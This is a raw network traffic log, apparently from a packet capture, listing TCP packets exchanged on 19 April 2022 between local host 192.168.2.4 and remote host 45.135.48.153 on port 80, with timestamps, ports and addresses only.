Apr 19, 2022 16:44:44.865658998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.865734100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.865838051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.865897894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.865972042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866019011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.866054058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866197109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866292953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866350889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.866374016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866425037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.866565943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866622925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866748095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866805077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.866900921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.866952896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.866972923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867173910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867197990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867319107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.867325068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867408991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867460012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.867541075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867600918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.867650986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867758036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867877960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.867937088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.868014097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868062973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.868133068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868211985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868339062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868391991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.868427992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868483067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.868573904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868642092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868773937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868809938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.868895054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.868943930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.869013071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869133949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869251966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869304895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.869354963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869405031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.869462967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869574070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869632006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.869716883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869822025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.869879961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.869935036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870019913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870182991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870249987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.870254040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870306969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.870374918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870493889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870595932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870656967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.870735884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870788097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.870817900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.870935917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871057034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871109009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.871148109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871202946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.871251106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871404886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871529102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871586084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.871695042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871733904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.871743917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.871891022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872014999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872093916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.872165918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872184038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872216940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.872298002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872350931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.872416973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872534037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872781992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.872860909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.873012066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873080969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.873233080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873524904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873636007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873703957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873709917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.873770952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.873819113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.873939037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874018908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874121904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.874128103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874178886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.874289989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874361992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874485970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874540091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.874614000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874663115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.874742985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874823093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874942064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.874994040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.875057936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875103951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.875159025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875300884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875384092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875431061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.875489950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875534058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.875626087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875746965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875802040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.875904083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875931978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.875984907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.876060963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876179934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876303911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876357079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.876398087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876445055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.876542091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876662016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876785040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876836061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.876862049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.876910925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.876971960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877140045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877198935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877201080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.877302885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877459049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877512932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.877523899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877569914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.877660990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877768993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877892017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.877953053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.877993107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878052950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.878087997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878225088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878349066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878417015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.878458977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878530979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878530979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.878669977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878757000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878818035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.878881931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.878936052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.879019022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879139900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879261017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879324913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.879384995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879447937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.879460096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879596949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879693985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879746914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.879815102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.879863024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.879935980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880029917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880176067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880223989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.880258083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880306959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.880374908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880486012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880603075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880675077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.880703926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880769968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.880801916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.880995035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881053925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881107092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.881179094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881230116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.881330967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881383896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881493092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881546974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.881635904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881690979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.881731033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881860971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.881978035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882033110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.882069111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882123947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.882219076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882338047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882424116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882479906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.882584095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882615089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882637978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.882755995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882857084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.882914066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.883091927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.883140087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.883337021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.883687973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.883708000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.883775949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.883816004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.883879900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.884061098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.884263039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.884330034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.884493113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.884776115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.884974003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885046959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.885107040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885164022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.885179996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885344028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885425091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.885425091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885579109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885658979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885725975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.885767937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885829926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.885902882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.885989904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886142015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886224031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.886228085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886293888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.886369944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886456966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886571884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886658907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886734009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.886790991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886900902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.886962891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.887016058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887121916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887255907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887315035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.887370110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887425900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.887502909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887579918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887725115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887774944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.887862921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.887912035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.887932062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888019085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888181925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888231039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.888345003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888398886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.888442039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888541937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888614893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888664961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.888705969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888762951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.888814926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.888942003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889054060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889107943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.889199972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889252901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.889276028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889410019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889486074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889537096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.889635086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889688015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.889741898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889857054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.889914036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.889966011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890093088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890185118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890244007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.890295982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890347004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.890419006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890520096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890572071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.890666008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890767097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890857935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.890909910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.890980005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891032934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.891098022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891191959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891298056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891347885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.891424894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891484976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.891536951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891664982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891765118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891824961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.891885996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.891948938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.892023087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.892142057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.892220974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.892292023 CEST	49758	80	192.168.2.4	45.135.48.153
